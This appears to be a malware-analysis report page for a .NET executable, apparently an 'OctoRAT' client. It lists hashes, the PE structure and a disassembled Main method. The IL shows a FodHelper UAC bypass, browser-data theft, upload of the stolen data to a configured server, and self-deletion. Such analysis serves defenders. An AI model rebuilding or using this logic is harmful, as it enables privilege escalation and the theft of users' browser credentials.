Suspicious
Suspect

9a5ff998dbf0f6923d0b454d89800fb4

PE Executable
|
MD5: 9a5ff998dbf0f6923d0b454d89800fb4
|
Size: 228.35 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
9a5ff998dbf0f6923d0b454d89800fb4
Sha1
4f4fa23e9c503b941a5e91584d6ecc3813962ba1
Sha256
360e6f2288b6c8364159e80330b9af83f2d561929d206bc1e1e5f1585432b28f
Sha384
4de8e7453301401389a8dc13441ad8cee805eae765223bbf4bc510c9abd03f5912000684aef68639d1a10b93a8846dff
Sha512
cee9cbb97f8f256a039b009bc3e0c286945d14ce80c51e5f7be51e27ddfbee2864eb7c04c33a52e4cd82767921a073075dffa3ddb4cac5cb769329f1d98b172e
SSDeep
3072:y7P9YD7qHKLnO89zkxt2WpZirqaN5Eq52qPyFmrvixQhgtVA7fTFAbH+3ljZUaO7:Z7Or8rqc2q0qPyMKCes7fT2bU
TLSH
B324C55563F94600F2FF6F79A9B145210A73B897AC36E30E0989549E1FB3B81D821B73
File Structure
9a5ff998dbf0f6923d0b454d89800fb4
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_RCDATA
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\sulum\OneDrive\Desktop\datacenter\stubCsharp\obj\Release\Client.pdb
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void Client.Program::Main(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1821
Main Method

System.Void Client.Program::Main(System.String[])
Main IL Instruction Count

175
Main IL

call System.Void BrowserDataExtractor.iamfine::EnsureSQLiteDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0134: ldnull call System.String Client.ResourceReader::GetConfig() stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0061: ldloc.3 ldloc.2 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_4 ldloc.s V_4 ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_0061: ldloc.3 ldloc.s V_4 ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.3 <null> ldloc.3 <null> brfalse IL_011B: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00AB: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_5 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_0262: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0134: ldnull ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldnull <null> newobj System.Void BrowserDataExtractor.BrowserDataExtractor::.ctor(System.String) stloc.0 <null> ldloc.0 <null> callvirt System.Void BrowserDataExtractor.BrowserDataExtractor::Run() call System.String Client.ResourceReader::GetIP() stloc.s V_6 call System.String Client.ResourceReader::GetPort() stloc.s V_7 ldloc.s V_6 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0161: ldstr "127.0.0.1" ldloc.s V_7 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_016F: ldloc.s V_7 ldstr 127.0.0.1 stloc.s V_6 ldstr 8080 stloc.s V_7 ldloc.s V_7 ldloca.s V_8 call System.Boolean System.Int32::TryParse(System.String,System.Int32&) brtrue.s IL_0181: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}..." ldc.i4 8080 stloc.s V_8 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}... call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_6 ldloc.s V_8 box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) ldloc.0 <null> ldloc.s V_6 ldloc.s V_8 callvirt System.Boolean BrowserDataExtractor.BrowserDataExtractor::UploadToServer(System.String,System.Int32) brfalse.s IL_01CA: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed!" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data uploaded successfully! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) br.s IL_01E3: leave.s IL_0209 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 stloc.s V_9 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Error uploading browser data: {1} call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_9 callvirt System.String System.Exception::get_Message() call System.String System.String::Format(System.String,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_10 ldloc.1 <null> brtrue.s IL_021D: nop leave.s IL_0262: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_0262: ret stloc.s V_11 ldstr Fatal error: ldloc.s V_11 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_0262: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_0255: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_10 brfalse.s IL_0261: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
9a5ff998dbf0f6923d0b454d89800fb4 (228.35 KB)
File Structure
9a5ff998dbf0f6923d0b454d89800fb4
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_RCDATA
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙